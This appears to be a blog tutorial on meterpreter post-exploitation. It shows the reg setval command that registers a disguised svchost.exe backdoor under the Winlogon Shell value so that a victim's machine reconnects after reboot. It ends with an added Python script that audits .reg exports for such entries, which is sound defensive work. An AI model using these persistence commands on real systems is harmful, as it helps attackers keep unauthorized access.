Once Kali Linux has obtained a meterpreter shell on the victim's system, the shell supports a variety of attack commands, including privilege escalation, keylogging, screenshots, registry manipulation, and process control.


Among these attack commands is registry manipulation. The meterpreter session is lost when the victim reboots, so if the backdoor is registered under an autostart registry key, the session is re-established after the reboot.



Kali Linux Registry

After a successful penetration, the attacker uploads a backdoor (svchost.exe) to a specific location so the victim's system can be re-entered later. The backdoor is also registered in the startup registry so that the victim automatically connects back to the attacker after each reboot.

 

Kali Linux Registry Manipulation

After the registry has been modified from the meterpreter shell, go to the victim's system and open the Registry Editor. Navigating to the startup registry path shows svchost.exe registered there.



⊙ reg enumkey

○ Enumerate registry keys

○ reg enumkey -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon"

○ -k : registry path


⊙ reg queryval

○ Query a registry value

○ reg queryval -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon" -v shell

○ -k : registry path

○ -v : Registry Value Name


⊙ reg setval

○ Add/modify registry values

○ reg setval -k "HKLM\\software\\microsoft\\windows nt\\currentversion\\winlogon" -v shell -d "explorer.exe C:\\Windows\\svchost.exe"
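The Winlogon Shell value shown above is exactly what a defender should be auditing: on a clean Windows installation it holds only explorer.exe, and Userinit holds only userinit.exe. The following Python script is an added example, not code from the original post. It parses a `.reg` export of the Winlogon key (the format written by regedit or `reg export`) and reports any program listed in Shell or Userinit that is not in the expected default set. The export text embedded in the script is constructed for the example; the key path and default values are standard Windows ones.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample .reg export (regedit "Export" format). It is not taken
# from the original post: the "Shell" value carries one extra program.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe C:\\Windows\\svchost.exe"
"Userinit"="C:\\Windows\\system32\\userinit.exe,"
"AutoRestartShell"=dword:00000001
'''

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Expected defaults on a clean Windows install (compared case-insensitively).
EXPECTED = {
    "shell": ["explorer.exe"],
    "userinit": [r"c:\windows\system32\userinit.exe"],
}


def _unescape_reg_string(raw: str) -> str:
    # Inside a quoted REG_SZ value a .reg file escapes '\' as '\\' and '"' as '\"'.
    return re.sub(r"\\(.)", r"\1", raw)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a .reg export into {key_path: {value_name: value}}.
    REG_SZ values are unescaped; other types (dword:, hex:) are kept as raw text."""
    keys: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'^"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if m and current is not None:
            name = _unescape_reg_string(m.group(1))
            value = m.group(2)
            if value.startswith('"') and value.endswith('"'):
                value = _unescape_reg_string(value[1:-1])
            keys[current][name] = value
    return keys


def _entries(value: str) -> List[str]:
    # Winlogon lists programs separated by commas; the meterpreter example on
    # this page uses a space, so split on both. Paths containing spaces would
    # be split too, which is acceptable for a heuristic audit.
    return [p.lower() for p in re.split(r"[,\s]+", value.strip()) if p]


def find_winlogon_anomalies(text: str) -> List[Tuple[str, str]]:
    """Return (value_name, unexpected_program) pairs for every program in the
    Winlogon Shell or Userinit values that is not an expected default."""
    findings: List[Tuple[str, str]] = []
    values = parse_reg_export(text).get(WINLOGON_KEY, {})
    for name, expected in EXPECTED.items():
        raw = next((v for n, v in values.items() if n.lower() == name), None)
        if raw is None:
            continue
        for entry in _entries(raw):
            if entry not in expected:
                findings.append((name, entry))
    return findings


if __name__ == "__main__":
    for name, program in find_winlogon_anomalies(SAMPLE_REG_EXPORT):
        print(f"Winlogon {name}: unexpected autostart program {program}")
```

On a real host the input would come from `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" winlogon.reg`; that file is written as UTF-16 with a byte-order mark, so open it with `encoding="utf-16"` before passing the text to `find_winlogon_anomalies`. Any finding means something other than the default shell runs at every logon and deserves investigation.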

